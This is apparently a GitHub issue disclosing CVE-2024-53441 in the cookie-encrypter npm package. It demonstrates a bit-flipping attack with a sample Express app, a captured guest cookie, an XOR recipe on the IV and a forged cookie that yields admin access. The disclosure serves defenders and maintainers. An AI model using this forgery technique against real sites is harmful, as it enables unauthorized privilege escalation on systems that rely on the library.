cookie-encrypter icon indicating copy to clipboard operation
cookie-encrypter copied to clipboard

Published 20 hours ago verified publisher icon ebourmalo

Vulnerable to bit flipping CVE-2024-53441

Open mathysEthical opened this issue 2 months ago • 0 comments

cookie-encrypter Vulnerability

Let's imagine a website with the following source code:

const express = require('express');
const cookieParser = require('cookie-parser');
const cookieEncrypter = require('cookie-encrypter');
const app = express();

app.use(cookieParser("NicePasswordHereItIsAGoodSecret!"));
app.use(cookieEncrypter("NicePasswordHereItIsAGoodSecret!"));
 
app.get('/login', function(req, res) {
    res.cookie("role","guest")
    res.send("logged in as guest")
})

app.get("/admin",(req,res)=>{
    console.log(req.cookies)
    if(req.cookies.role=="admin"){
        res.send("Access granted.")
    }else{
        res.send("Access denied.")
    }
})

app.listen(80)

We load /login and get a cookie as guest:

e:87c3aa62cf38214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

We now have to XOR the IV: 87c3aa62cf38214f7c25d66eacb4c95a

We xor it by guest and by admin to change do the bit flip attack, here is a link to help: https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'67756573740000000000000000000000'%7D,'Standard',false)XOR(%7B'option':'Hex','string':'61646d696e0000000000000000000000'%7D,'Standard',false)To_Hex('None',0)&input=ODdjM2FhNjJjZjM4MjE0ZjdjMjVkNjZlYWNiNGM5NWE

So we get the following crafted cookie:

e:81d2a278d538214f7c25d66eacb4c95a:9df91af30fafe915f3ef71069653d4c1

And now loading /admin we get: Access granted.

To reference this, use CVE-2024-53441

mathysEthical avatar Dec 06 '24 17:12 mathysEthical